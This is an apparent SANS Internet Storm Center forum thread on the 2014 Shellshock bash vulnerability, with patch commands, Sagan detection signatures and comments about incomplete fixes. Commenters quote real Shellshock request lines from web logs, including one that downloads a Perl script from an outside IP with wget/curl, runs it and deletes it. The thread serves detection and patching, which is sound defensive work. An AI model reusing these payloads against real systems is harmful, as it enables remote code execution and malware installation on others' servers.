SANS ISC: Attention *NIX admins, time to patch! - SANS Internet Storm Center

• SANS Site Network
  • Current Site
  • SANS Internet Storm Center
  • Other SANS Sites Help
  • Graduate Degree Programs
  • Security Training
  • Security Certification
  • Security Awareness Training
  • Penetration Testing
  • Industrial Control Systems
  • Cyber Defense Foundations
  • DFIR
  • Software Security
  • Government OnSite Training

SANS ISC InfoSec Forums

The good news is that it's an easy fix:

Debian (Ubuntu, etc.): apt-get upgrade bash
RHEL (Fedora, CentOS, etc.): yum update bash

We've created the first batch of Sagan (log analysis engine - http://sagan.io) signatures to detect this. This monitor bash history and Apache logs for attempts. More information can be found at:

https://groups.google.com/forum/#!topic/sagan-users/Z8GEj20b0K4

Apache:

alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[APACHE] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; program: apache|httpd; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; parse_src_ip: 1; fwsam: src, 1 day; reference: url,wiki.quadrantsec.com/bin/view/Main/5002180; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002180; rev:2;)

Bash:

alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[BASH] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; content: "HISTORY"; program: bash|-bash; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; reference: url,wiki.quadrantsec.com/bin/view/Main/5002179; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002179; rev:1;)

Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.
https://access.redhat.com/articles/1200223

Red Hat provided an update indicating the patches are not complete and a new CVE has been assigned (CVE-2014-7169); more here:

https://access.redhat.com/articles/1200223

We've just started seeing scanning traffic using the following packet contents:

GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138
Accept: */*

This also appears to be using spoofed source IP's. No logs at this time.

You can't spoof a TCP payload. I've seen the above attacks from 89.207.135.125 which is (to me), obviously a host for malware sites and this sort of activity.

It seems to be a copycat of the 'Errata Sec' scans, which I feel are totally illegal too. (Breaking into a computer to run ping is bad, even if you say you're a security researcher. Wastes admins' time to follow up on the attack, and we also don't know who else the scan results are shared with / intercepted by).

Examples from my webserver log:

89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
109.202.102.224 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""


Shouldn't this rate setting the Threat Level to at least chartreuse?